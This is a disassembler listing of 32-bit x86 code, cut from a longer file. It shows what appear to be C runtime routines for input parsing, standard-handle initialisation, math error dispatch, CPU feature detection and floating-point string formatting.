add [ebp-1ACh], eax
adc [ebp-1A8h], edx
cmp dword ptr [ebp-1B4h], 0
jz short loc_423EB2
dec dword ptr [ebp-18Ch]
jnz short loc_423EB2
mov byte ptr [ebp-17Dh], 1
jmp short loc_423EDA
; ---------------------------------------------------------------------------
loc_423EB2: ; CODE XREF: sub_423327+B78�j
; sub_423327+B80�j
inc dword ptr [ebp-184h]
mov edx, [ebp+8]
call sub_423311
mov ebx, eax
jmp short loc_423EDA
; ---------------------------------------------------------------------------
loc_423EC4: ; CODE XREF: sub_423327+B59�j
dec dword ptr [ebp-184h]
cmp ebx, 0FFFFFFFFh
jz short loc_423EDA
push dword ptr [ebp+8]
push ebx
call sub_427140
pop ecx
pop ecx
loc_423EDA: ; CODE XREF: sub_423327+B89�j
; sub_423327+B9B�j ...
cmp byte ptr [ebp-17Dh], 0
jz loc_423D9D
mov [ebp-194h], ebx
loc_423EED: ; CODE XREF: sub_423327+A6B�j
cmp byte ptr [ebp-197h], 0
jz loc_424043
mov eax, [ebp-1ACh]
neg eax
mov ecx, [ebp-1A8h]
adc ecx, 0
neg ecx
mov [ebp-1ACh], eax
mov [ebp-1A8h], ecx
jmp loc_424043
; ---------------------------------------------------------------------------
loc_423F1E: ; CODE XREF: sub_423327+A5E�j
cmp byte ptr [ebp-17Dh], 0
jnz loc_424034
mov esi, 80h
loc_423F30: ; CODE XREF: sub_423327+D01�j
cmp edi, 78h
jz short loc_423F85
cmp edi, 70h
jz short loc_423F85
cmp ds:dword_4437B0, 1
jle short loc_423F4F
push 4
push ebx
call sub_422B91
pop ecx
pop ecx
jmp short loc_423F5B
; ---------------------------------------------------------------------------
loc_423F4F: ; CODE XREF: sub_423327+C1A�j
mov eax, ds:off_4437D8
movzx eax, byte ptr [eax+ebx*2]
and eax, 4
loc_423F5B: ; CODE XREF: sub_423327+C26�j
test eax, eax
jz short loc_423FBA
cmp edi, 6Fh
jnz short loc_423F72
cmp ebx, 38h
jge short loc_423FBA
shl dword ptr [ebp-1A0h], 3
jmp short loc_423FC0
; ---------------------------------------------------------------------------
loc_423F72: ; CODE XREF: sub_423327+C3B�j
mov eax, [ebp-1A0h]
lea eax, [eax+eax*4]
shl eax, 1
mov [ebp-1A0h], eax
jmp short loc_423FC0
; ---------------------------------------------------------------------------
loc_423F85: ; CODE XREF: sub_423327+C0C�j
; sub_423327+C11�j
cmp ds:dword_4437B0, 1
jle short loc_423F99
push esi
push ebx
call sub_422B91
pop ecx
pop ecx
jmp short loc_423FA4
; ---------------------------------------------------------------------------
loc_423F99: ; CODE XREF: sub_423327+C65�j
mov eax, ds:off_4437D8
movzx eax, byte ptr [eax+ebx*2]
and eax, esi
loc_423FA4: ; CODE XREF: sub_423327+C70�j
test eax, eax
jz short loc_423FBA
shl dword ptr [ebp-1A0h], 4
mov eax, ebx
call sub_4232DF
mov ebx, eax
jmp short loc_423FC0
; ---------------------------------------------------------------------------
loc_423FBA: ; CODE XREF: sub_423327+C36�j
; sub_423327+C40�j ...
inc byte ptr [ebp-17Dh]
loc_423FC0: ; CODE XREF: sub_423327+C49�j
; sub_423327+C5C�j ...
cmp byte ptr [ebp-17Dh], 0
jnz short loc_42400B
inc dword ptr [ebp-19Ch]
mov eax, [ebp-1A0h]
lea eax, [eax+ebx-30h]
mov [ebp-1A0h], eax
cmp dword ptr [ebp-1B4h], 0
jz short loc_423FF9
dec dword ptr [ebp-18Ch]
jnz short loc_423FF9
mov byte ptr [ebp-17Dh], 1
jmp short loc_424021
; ---------------------------------------------------------------------------
loc_423FF9: ; CODE XREF: sub_423327+CBF�j
; sub_423327+CC7�j
inc dword ptr [ebp-184h]
mov edx, [ebp+8]
call sub_423311
mov ebx, eax
jmp short loc_424021
; ---------------------------------------------------------------------------
loc_42400B: ; CODE XREF: sub_423327+CA0�j
dec dword ptr [ebp-184h]
cmp ebx, 0FFFFFFFFh
jz short loc_424021
push dword ptr [ebp+8]
push ebx
call sub_427140
pop ecx
pop ecx
loc_424021: ; CODE XREF: sub_423327+CD0�j
; sub_423327+CE2�j ...
cmp byte ptr [ebp-17Dh], 0
jz loc_423F30
mov [ebp-194h], ebx
loc_424034: ; CODE XREF: sub_423327+BFE�j
cmp byte ptr [ebp-197h], 0
jz short loc_424043
neg dword ptr [ebp-1A0h]
loc_424043: ; CODE XREF: sub_423327+BCD�j
; sub_423327+BF2�j ...
cmp edi, 46h
jnz short loc_42404F
and dword ptr [ebp-19Ch], 0
loc_42404F: ; CODE XREF: sub_423327+D1F�j
cmp dword ptr [ebp-19Ch], 0
jz loc_424147
cmp byte ptr [ebp-18Eh], 0
jnz short loc_4240A3
inc dword ptr [ebp-1B8h]
mov ebx, [ebp-1B0h]
mov eax, [ebp-1A0h]
loc_424077: ; CODE XREF: sub_423327+33C�j
cmp dword ptr [ebp-1C8h], 0
jz short loc_424093
mov eax, [ebp-1ACh]
mov [ebx], eax
mov eax, [ebp-1A8h]
mov [ebx+4], eax
jmp short loc_4240A3
; ---------------------------------------------------------------------------
loc_424093: ; CODE XREF: sub_423327+D57�j
cmp byte ptr [ebp-18Dh], 0
jz short loc_4240A0
mov [ebx], eax
jmp short loc_4240A3
; ---------------------------------------------------------------------------
loc_4240A0: ; CODE XREF: sub_423327+D73�j
mov [ebx], ax
loc_4240A3: ; CODE XREF: sub_423327+342�j
; sub_423327+590�j ...
inc byte ptr [ebp-195h]
inc dword ptr [ebp+0Ch]
mov esi, [ebp+0Ch]
jmp short loc_424128
; ---------------------------------------------------------------------------
loc_4240B1: ; CODE XREF: sub_423327+C8�j
inc dword ptr [ebp-184h]
mov edx, [ebp+8]
call sub_423311
mov ebx, eax
mov [ebp-194h], ebx
movzx eax, byte ptr [esi]
inc esi
mov [ebp+0Ch], esi
cmp eax, ebx
jnz short loc_42410B
movzx eax, bl
mov ecx, ds:off_4437D8
test byte ptr [ecx+eax*2+1], 80h
jz short loc_424128
inc dword ptr [ebp-184h]
mov edx, [ebp+8]
call sub_423311
movzx ecx, byte ptr [esi]
inc esi
mov [ebp+0Ch], esi
cmp ecx, eax
jz short loc_424122
cmp eax, 0FFFFFFFFh
jz short loc_42410B
push dword ptr [ebp+8]
push eax
call sub_427140
pop ecx
pop ecx
loc_42410B: ; CODE XREF: sub_423327+DA9�j
; sub_423327+DD7�j
cmp ebx, 0FFFFFFFFh
loc_42410E: ; CODE XREF: sub_423327+628�j
jz short loc_424147
push dword ptr [ebp+8]
push dword ptr [ebp-194h]
call sub_427140
pop ecx
pop ecx
jmp short loc_424147
; ---------------------------------------------------------------------------
loc_424122: ; CODE XREF: sub_423327+DD2�j
dec dword ptr [ebp-184h]
loc_424128: ; CODE XREF: sub_423327+D88�j
; sub_423327+DB9�j
cmp dword ptr [ebp-194h], 0FFFFFFFFh
jnz loc_42336D
cmp byte ptr [esi], 25h
jnz short loc_424147
mov eax, [ebp+0Ch]
cmp byte ptr [eax+1], 6Eh
jz loc_42336A
loc_424147: ; CODE XREF: sub_423327+4A�j
; sub_423327+583�j ...
cmp dword ptr [ebp-1D8h], 1
jnz short loc_42415C
push dword ptr [ebp-1BCh]
call sub_41E2A1
pop ecx
loc_42415C: ; CODE XREF: sub_423327+E27�j
mov eax, [ebp-1B8h]
cmp dword ptr [ebp-194h], 0FFFFFFFFh
jnz short loc_42417A
test eax, eax
jnz short loc_42417A
cmp [ebp-195h], al
jnz short loc_42417A
or eax, 0FFFFFFFFh
loc_42417A: ; CODE XREF: sub_423327+E42�j
; sub_423327+E46�j ...
lea esp, [ebp-1E8h]
mov ecx, [ebp-1Ch]
call sub_422B83
call sub_425F4F
retn
sub_423327 endp
; =============== S U B R O U T I N E =======================================
sub_42418E proc near ; CODE XREF: start-C31F8�p
var_44 = byte ptr -44h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
sub esp, 44h
push 100h
call sub_41E5D3
test eax, eax
pop ecx
jnz short loc_4241A8
or eax, 0FFFFFFFFh
jmp loc_424335
; ---------------------------------------------------------------------------
loc_4241A8: ; CODE XREF: sub_42418E+10�j
mov ds:dword_4E2BA0, eax
mov ds:dword_4E2B98, 20h
lea ecx, [eax+100h]
jmp short loc_4241D9
; ---------------------------------------------------------------------------
loc_4241BF: ; CODE XREF: sub_42418E+4D�j
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+4], 0
mov byte ptr [eax+5], 0Ah
mov ecx, ds:dword_4E2BA0
add eax, 8
add ecx, 100h
loc_4241D9: ; CODE XREF: sub_42418E+2F�j
cmp eax, ecx
jb short loc_4241BF
push ebx
push esi
push edi
lea eax, [esp+50h+var_44]
push eax
call ds:dword_42B1A4 ; GetStartupInfoA
cmp [esp+4Ch+var_E], 0
jz loc_4242BE
mov eax, [esp+4Ch+var_C]
test eax, eax
jz loc_4242BE
mov esi, [eax]
push ebp
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_424217
mov esi, eax
loc_424217: ; CODE XREF: sub_42418E+85�j
cmp ds:dword_4E2B98, esi
jge short loc_424271
mov edi, offset dword_4E2BA4
loc_424224: ; CODE XREF: sub_42418E+D9�j
push 100h
call sub_41E5D3
test eax, eax
pop ecx
jz short loc_42426B
add ds:dword_4E2B98, 20h
mov [edi], eax
lea ecx, [eax+100h]
jmp short loc_42425A
; ---------------------------------------------------------------------------
loc_424244: ; CODE XREF: sub_42418E+CE�j
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+4], 0
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
loc_42425A: ; CODE XREF: sub_42418E+B4�j
cmp eax, ecx
jb short loc_424244
add edi, 4
cmp ds:dword_4E2B98, esi
jl short loc_424224
jmp short loc_424271
; ---------------------------------------------------------------------------
loc_42426B: ; CODE XREF: sub_42418E+A3�j
mov esi, ds:dword_4E2B98
loc_424271: ; CODE XREF: sub_42418E+8F�j
; sub_42418E+DB�j
xor edi, edi
test esi, esi
jle short loc_4242BD
loc_424277: ; CODE XREF: sub_42418E+12D�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_4242B4
mov cl, [ebp+0]
test cl, 1
jz short loc_4242B4
test cl, 8
jnz short loc_424296
push eax
call ds:dword_42B184 ; GetFileType
test eax, eax
jz short loc_4242B4
loc_424296: ; CODE XREF: sub_42418E+FB�j
mov eax, edi
sar eax, 5
mov eax, ds:dword_4E2BA0[eax*4]
mov ecx, edi
and ecx, 1Fh
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_4242B4: ; CODE XREF: sub_42418E+EE�j
; sub_42418E+F6�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_424277
loc_4242BD: ; CODE XREF: sub_42418E+E7�j
pop ebp
loc_4242BE: ; CODE XREF: sub_42418E+63�j
; sub_42418E+6F�j
xor ebx, ebx
loc_4242C0: ; CODE XREF: sub_42418E+194�j
mov eax, ds:dword_4E2BA0
lea esi, [eax+ebx*8]
cmp dword ptr [esi], 0FFFFFFFFh
jnz short loc_42431A
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_4242DA
push 0FFFFFFF6h
pop eax
jmp short loc_4242E4
; ---------------------------------------------------------------------------
loc_4242DA: ; CODE XREF: sub_42418E+145�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_4242E4: ; CODE XREF: sub_42418E+14A�j
push eax
call ds:dword_42B188 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_424309
push edi
call ds:dword_42B184 ; GetFileType
test eax, eax
jz short loc_424309
and eax, 0FFh
cmp eax, 2
mov [esi], edi
jnz short loc_42430F
loc_424309: ; CODE XREF: sub_42418E+162�j
; sub_42418E+16D�j
or byte ptr [esi+4], 40h
jmp short loc_42431E
; ---------------------------------------------------------------------------
loc_42430F: ; CODE XREF: sub_42418E+179�j
cmp eax, 3
jnz short loc_42431E
or byte ptr [esi+4], 8
jmp short loc_42431E
; ---------------------------------------------------------------------------
loc_42431A: ; CODE XREF: sub_42418E+13D�j
or byte ptr [esi+4], 80h
loc_42431E: ; CODE XREF: sub_42418E+17F�j
; sub_42418E+184�j ...
inc ebx
cmp ebx, 3
jl short loc_4242C0
push ds:dword_4E2B98
call ds:dword_42B18C ; LockResource
pop edi
pop esi
xor eax, eax
pop ebx
loc_424335: ; CODE XREF: sub_42418E+15�j
add esp, 44h
retn
sub_42418E endp
; ---------------------------------------------------------------------------
db 56h, 57h, 6Ah
dd 0FF335E03h, 3F203539h, 447E004Eh, 4E2F08A1h, 0B0048B00h
dd 2F74C085h, 830C40F6h, 0E8500D74h, 0FFFF9EEBh, 59FFF883h
dd 83470174h, 177C14FEh, 4E2F08A1h, 0B034FF00h, 0FF9F28E8h
dd 2F08A1FFh, 2483004Eh, 465900B0h, 3F20353Bh, 0BC7C004Eh
dd 5E5FC78Bh
db 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424391 proc near ; CODE XREF: sub_41FCC0+B5�p
; sub_4203C0+B5�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, ds:dword_4437D4
mov [ebp+var_4], eax
mov eax, [ebp+arg_C]
mov ecx, 0A1h
cmp eax, ecx
push esi
jg loc_4244C3
jz loc_4244B7
cmp eax, 18h
jg loc_424447
jz short loc_424434
push 2
pop ecx
sub eax, ecx
jz short loc_424425
dec eax
jz short loc_424419
sub eax, 5
jz short loc_42440A
dec eax
jz short loc_4243FE
sub eax, 5
jz short loc_4243EB
dec eax
jnz loc_424612
mov [ebp+var_20], offset aExp ; "exp"
jmp loc_424488
; ---------------------------------------------------------------------------
loc_4243EB: ; CODE XREF: sub_424391+45�j
mov [ebp+var_24], 3
mov [ebp+var_20], offset aExp ; "exp"
jmp loc_42454A
; ---------------------------------------------------------------------------
loc_4243FE: ; CODE XREF: sub_424391+40�j
mov [ebp+var_20], offset aLog10 ; "log10"
jmp loc_4245B0
; ---------------------------------------------------------------------------
loc_42440A: ; CODE XREF: sub_424391+3D�j
mov [ebp+var_24], ecx
mov [ebp+var_20], offset aLog10 ; "log10"
jmp loc_42454A
; ---------------------------------------------------------------------------
loc_424419: ; CODE XREF: sub_424391+38�j
mov [ebp+var_20], offset aLog ; "log"
jmp loc_4245B0
; ---------------------------------------------------------------------------
loc_424425: ; CODE XREF: sub_424391+35�j
mov [ebp+var_24], ecx
mov [ebp+var_20], offset aLog ; "log"
jmp loc_42454A
; ---------------------------------------------------------------------------
loc_424434: ; CODE XREF: sub_424391+2E�j
mov [ebp+var_24], 3
loc_42443B: ; CODE XREF: sub_424391+E2�j
mov [ebp+var_20], offset aPow ; "pow"
jmp loc_42454A
; ---------------------------------------------------------------------------
loc_424447: ; CODE XREF: sub_424391+28�j
sub eax, 19h
jz short loc_424481
dec eax
jz short loc_424475
dec eax
jz short loc_42446C
dec eax
jz loc_4245A9
dec eax
jnz loc_424612
mov [ebp+var_20], offset aPow ; "pow"
jmp loc_4245D1
; ---------------------------------------------------------------------------
loc_42446C: ; CODE XREF: sub_424391+BF�j
mov [ebp+var_24], 2
jmp short loc_42443B
; ---------------------------------------------------------------------------
loc_424475: ; CODE XREF: sub_424391+BC�j
mov eax, [ebp+arg_8]
fld1
fstp qword ptr [eax]
jmp loc_424612
; ---------------------------------------------------------------------------
loc_424481: ; CODE XREF: sub_424391+B9�j
mov [ebp+var_20], offset aPow ; "pow"
loc_424488: ; CODE XREF: sub_424391+55�j
mov eax, [ebp+arg_0]
fld qword ptr [eax]
mov eax, [ebp+arg_4]
mov esi, [ebp+arg_8]
fstp [ebp+var_1C]
fld qword ptr [eax]
lea eax, [ebp+var_24]
fstp [ebp+var_14]
push eax
fld qword ptr [esi]
mov [ebp+var_24], 4
fstp [ebp+var_C]
call ds:off_443A48
pop ecx
jmp loc_42460D
; ---------------------------------------------------------------------------
loc_4244B7: ; CODE XREF: sub_424391+1F�j
mov [ebp+var_24], 3
jmp loc_424543
; ---------------------------------------------------------------------------
loc_4244C3: ; CODE XREF: sub_424391+19�j
mov ecx, 3EAh
cmp eax, ecx
jg loc_42458D
jz loc_424584
sub eax, 0A2h
jz short loc_42453C
sub eax, 4
jz short loc_42452C
sub eax, 4
jz short loc_42451C
dec eax
jz short loc_424510
sub eax, 33Dh
jz short loc_424504
dec eax
jnz loc_424612
mov [ebp+var_20], offset aLog10 ; "log10"
jmp loc_4245D1
; ---------------------------------------------------------------------------
loc_424504: ; CODE XREF: sub_424391+15E�j
mov [ebp+var_20], offset aLog ; "log"
jmp loc_4245D1
; ---------------------------------------------------------------------------
loc_424510: ; CODE XREF: sub_424391+157�j
mov [ebp+var_20], offset aLog2 ; "log2"
jmp loc_4245B0
; ---------------------------------------------------------------------------
loc_42451C: ; CODE XREF: sub_424391+154�j
mov [ebp+var_24], 2
mov [ebp+var_20], offset aLog2 ; "log2"
jmp short loc_42454A
; ---------------------------------------------------------------------------
loc_42452C: ; CODE XREF: sub_424391+14F�j
mov [ebp+var_24], 3
mov [ebp+var_20], offset aExp10 ; "exp10"
jmp short loc_42454A
; ---------------------------------------------------------------------------
loc_42453C: ; CODE XREF: sub_424391+14A�j
mov [ebp+var_24], 4
loc_424543: ; CODE XREF: sub_424391+12D�j
mov [ebp+var_20], offset aExp2 ; "exp2"
loc_42454A: ; CODE XREF: sub_424391+68�j
; sub_424391+83�j ...
mov eax, [ebp+arg_0]
fld qword ptr [eax]
mov eax, [ebp+arg_4]
mov esi, [ebp+arg_8]
fstp [ebp+var_1C]
fld qword ptr [eax]
lea eax, [ebp+var_24]
fstp [ebp+var_14]
push eax
fld qword ptr [esi]
fstp [ebp+var_C]
call ds:off_443A48
test eax, eax
pop ecx
jnz loc_42460D
mov ds:dword_4E28F4, 22h
jmp loc_42460D
; ---------------------------------------------------------------------------
loc_424584: ; CODE XREF: sub_424391+13F�j
mov [ebp+var_20], offset aExp ; "exp"
jmp short loc_4245D1
; ---------------------------------------------------------------------------
loc_42458D: ; CODE XREF: sub_424391+139�j
sub eax, 3EBh
jz short loc_4245CA
dec eax
jz short loc_4245C1
dec eax
jz short loc_4245B8
dec eax
jz short loc_4245A9
dec eax
jnz short loc_424612
mov [ebp+var_20], offset aModf ; "modf"
jmp short loc_4245D1
; ---------------------------------------------------------------------------
loc_4245A9: ; CODE XREF: sub_424391+C2�j
; sub_424391+20A�j
mov [ebp+var_20], offset aPow ; "pow"
loc_4245B0: ; CODE XREF: sub_424391+74�j
; sub_424391+8F�j ...
mov eax, [ebp+arg_0]
mov esi, [ebp+arg_8]
jmp short loc_4245DB
; ---------------------------------------------------------------------------
loc_4245B8: ; CODE XREF: sub_424391+207�j
mov [ebp+var_20], offset aFloor ; "floor"
jmp short loc_4245D1
; ---------------------------------------------------------------------------
loc_4245C1: ; CODE XREF: sub_424391+204�j
mov [ebp+var_20], offset aCeil ; "ceil"
jmp short loc_4245D1
; ---------------------------------------------------------------------------
loc_4245CA: ; CODE XREF: sub_424391+201�j
mov [ebp+var_20], offset aAtan ; "atan"
loc_4245D1: ; CODE XREF: sub_424391+D6�j
; sub_424391+16E�j ...
mov eax, [ebp+arg_0]
fld qword ptr [eax]
mov esi, [ebp+arg_8]
fstp qword ptr [esi]
loc_4245DB: ; CODE XREF: sub_424391+225�j
fld qword ptr [eax]
mov eax, [ebp+arg_4]
fstp [ebp+var_1C]
mov [ebp+var_24], 1
fld qword ptr [eax]
lea eax, [ebp+var_24]
fstp [ebp+var_14]
push eax
fld qword ptr [esi]
fstp [ebp+var_C]
call ds:off_443A48
test eax, eax
pop ecx
jnz short loc_42460D
mov ds:dword_4E28F4, 21h
loc_42460D: ; CODE XREF: sub_424391+121�j
; sub_424391+1DE�j ...
fld [ebp+var_C]
fstp qword ptr [esi]
loc_424612: ; CODE XREF: sub_424391+48�j
; sub_424391+C9�j ...
mov ecx, [ebp+var_4]
pop esi
call sub_422B83
leave
retn
sub_424391 endp
; =============== S U B R O U T I N E =======================================
sub_42461D proc near ; CODE XREF: seg000:004246B3�p
push 0Ch
push offset dword_439B48
call sub_425F14
and dword ptr [ebp-1Ch], 0
and dword ptr [ebp-4], 0
movapd xmm0, xmm1
mov dword ptr [ebp-1Ch], 1
jmp short loc_424645
; ---------------------------------------------------------------------------
dw 0C033h
dd 658BC340h
db 0E8h
; ---------------------------------------------------------------------------
loc_424645: ; CODE XREF: sub_42461D+1F�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-1Ch]
call sub_425F4F
retn
sub_42461D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_424652: ; DATA XREF: seg002:0043C024�o
push ebp
mov ebp, esp
sub esp, 20h
mov eax, ds:dword_4437D4
mov [ebp-4], eax
xor eax, eax
push ebx
push esi
mov [ebp-1Ch], eax
mov [ebp-18h], eax
mov [ebp-14h], al
push ebx
pushf
pop eax
mov ecx, eax
xor eax, 200000h
push eax
popf
pushf
pop edx
sub edx, ecx
jz short loc_42469E
push ecx
popf
xor eax, eax
cpuid
mov [ebp-20h], eax
mov [ebp-14h], ebx
mov [ebp-10h], edx
mov [ebp-0Ch], ecx
mov eax, 1
cpuid
mov [ebp-1Ch], edx
mov [ebp-18h], eax
loc_42469E: ; CODE XREF: seg000:0042467D�j
pop ebx
and ds:dword_4E2B94, 0
and ds:dword_4E2B90, 0
test byte ptr [ebp-19h], 4
jz short loc_424712
call sub_42461D
test eax, eax
jz short loc_424712
push 0Ch
lea eax, [ebp-14h]
xor esi, esi
push eax
inc esi
push offset aAuthenticamd ; "AuthenticAMD"
mov ds:dword_4E2B94, esi
call sub_41EE80
add esp, 0Ch
test eax, eax
jnz short loc_42470C
mov ecx, [ebp-18h]
mov eax, ecx
sar eax, 8
and eax, 0Fh
sar ecx, 14h
mov edx, eax
sub edx, 0Fh
and ecx, 0FFh
neg edx
sbb edx, edx
not edx
and edx, ecx
add edx, eax
sub edx, 0Fh
neg edx
sbb edx, edx
inc edx
mov [ebp-20h], edx
jnz short loc_424712
loc_42470C: ; CODE XREF: seg000:004246DA�j
mov ds:dword_4E2B90, esi
loc_424712: ; CODE XREF: seg000:004246B1�j
; seg000:004246BA�j ...
mov ecx, [ebp-4]
xor eax, eax
call sub_422B83
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_424720(double)
sub_424720 proc near ; CODE XREF: sub_41FCC0+7�j
; sub_41FCC0+38�j
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push ds:dword_443A4C
call sub_427AA6
fld [ebp+arg_0]
pop ecx
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
push ecx
and ax, 7FF0h
cmp ax, 7FF0h
push ecx
fstp [esp+18h+var_18]
jnz short loc_4247A6
call sub_427978
test eax, eax
pop ecx
pop ecx
jle short loc_424789
cmp eax, 2
jle short loc_42477B
cmp eax, 3
jnz short loc_424789
fld [ebp+arg_0]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
push 0Bh ; int
call sub_427833
add esp, 10h
jmp short loc_4247EF
; ---------------------------------------------------------------------------
loc_42477B: ; CODE XREF: sub_424720+3F�j
push esi
push ebx
call sub_427AA6
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_4247EF
; ---------------------------------------------------------------------------
loc_424789: ; CODE XREF: sub_424720+3A�j
; sub_424720+44�j
fld [ebp+arg_0]
push ebx
fadd ds:dbl_439B68
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Bh
push 8
jmp short loc_4247E7
; ---------------------------------------------------------------------------
loc_4247A6: ; CODE XREF: sub_424720+2F�j
call sub_42793D
fstp [ebp+var_8]
fld [ebp+arg_0]
pop ecx
fld [ebp+var_8]
pop ecx
fucompp
fnstsw ax
test ah, 44h
jp short loc_4247CD
loc_4247BF: ; CODE XREF: sub_424720+B0�j
push esi
push ebx
call sub_427AA6
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_4247EF
; ---------------------------------------------------------------------------
loc_4247CD: ; CODE XREF: sub_424720+9D�j
test bl, 20h
jnz short loc_4247BF
fld [ebp+var_8]
push ebx ; int
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Bh ; int
push 10h ; int
loc_4247E7: ; CODE XREF: sub_424720+84�j
call sub_427885
add esp, 1Ch
loc_4247EF: ; CODE XREF: sub_424720+59�j
; sub_424720+67�j ...
pop esi
pop ebx
leave
retn
sub_424720 endp
; =============== S U B R O U T I N E =======================================
sub_4247F3 proc near ; CODE XREF: sub_4222C8+491�p
; DATA XREF: sub_41FDE2+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_420B27
cmp eax, 65h
pop ecx
jz short loc_424831
loc_424807: ; CODE XREF: sub_4247F3+3C�j
inc esi
cmp ds:dword_4437B0, 1
movsx eax, byte ptr [esi]
jle short loc_424820
push 4
push eax
call sub_422B91
pop ecx
pop ecx
jmp short loc_42482D
; ---------------------------------------------------------------------------
loc_424820: ; CODE XREF: sub_4247F3+1F�j
mov ecx, ds:off_4437D8
movzx eax, byte ptr [ecx+eax*2]
and eax, 4
loc_42482D: ; CODE XREF: sub_4247F3+2B�j
test eax, eax
jnz short loc_424807
loc_424831: ; CODE XREF: sub_4247F3+12�j
mov al, [esi]
mov cl, ds:byte_4437B4
mov [esi], cl
inc esi
loc_42483C: ; CODE XREF: sub_4247F3+54�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_42483C
pop esi
retn
sub_4247F3 endp
; =============== S U B R O U T I N E =======================================
sub_42484B proc near ; CODE XREF: sub_4222C8+4A2�p
; DATA XREF: sub_41FDE2+A�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
mov bl, ds:byte_4437B4
jmp short loc_42485D
; ---------------------------------------------------------------------------
loc_424858: ; CODE XREF: sub_42484B+16�j
cmp cl, bl
jz short loc_424863
inc eax
loc_42485D: ; CODE XREF: sub_42484B+B�j
mov cl, [eax]
test cl, cl
jnz short loc_424858
loc_424863: ; CODE XREF: sub_42484B+F�j
mov cl, [eax]
inc eax
test cl, cl
jz short loc_424894
jmp short loc_424877
; ---------------------------------------------------------------------------
loc_42486C: ; CODE XREF: sub_42484B+30�j
cmp cl, 65h
jz short loc_42487D
cmp cl, 45h
jz short loc_42487D
inc eax
loc_424877: ; CODE XREF: sub_42484B+1F�j
mov cl, [eax]
test cl, cl
jnz short loc_42486C
loc_42487D: ; CODE XREF: sub_42484B+24�j
; sub_42484B+29�j
mov edx, eax
loc_42487F: ; CODE XREF: sub_42484B+38�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_42487F
cmp [eax], bl
jnz short loc_42488A
dec eax
loc_42488A: ; CODE XREF: sub_42484B+3C�j
; sub_42484B+47�j
mov cl, [edx]
inc eax
inc edx
test cl, cl
mov [eax], cl
jnz short loc_42488A
loc_424894: ; CODE XREF: sub_42484B+1D�j
pop ebx
retn
sub_42484B endp
; ---------------------------------------------------------------------------
word_424896 dw 448Bh ; DATA XREF: sub_41FDE2+28�o
; seg002:off_443A60�o
dd 0DD0424h, 9B701DDCh, 0E0DF0043h, 7501C4F6h, 40C03304h
dd 0C3C033C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4248B0 proc near ; CODE XREF: sub_423327+5B5�p
; DATA XREF: sub_41FDE2+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_4248D9
lea eax, [ebp+var_8]
push eax
call sub_427E44
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_4248D9: ; CODE XREF: sub_4248B0+C�j
lea eax, [ebp+arg_0]
push eax
call sub_427E81
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [eax], ecx
leave
retn
sub_4248B0 endp
; =============== S U B R O U T I N E =======================================
sub_4248EE proc near ; CODE XREF: sub_42490B+2F�p
; sub_4249FC+7E�p ...
test edi, edi
push esi
mov esi, eax
jz short loc_424909
push esi
call sub_41E1C0
inc eax
push eax
push esi
add esi, edi
push esi
call sub_41F980
add esp, 10h
loc_424909: ; CODE XREF: sub_4248EE+5�j
pop esi
retn
sub_4248EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42490B proc near ; CODE XREF: sub_424AD9+96�p
; sub_424B83+47�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp ds:byte_4E2978, 0
push ebx
push esi
push edi
jz short loc_424941
mov ebx, [ebp+arg_8]
mov eax, ds:dword_4E2974
xor ecx, ecx
test ebx, ebx
setnle cl
xor edx, edx
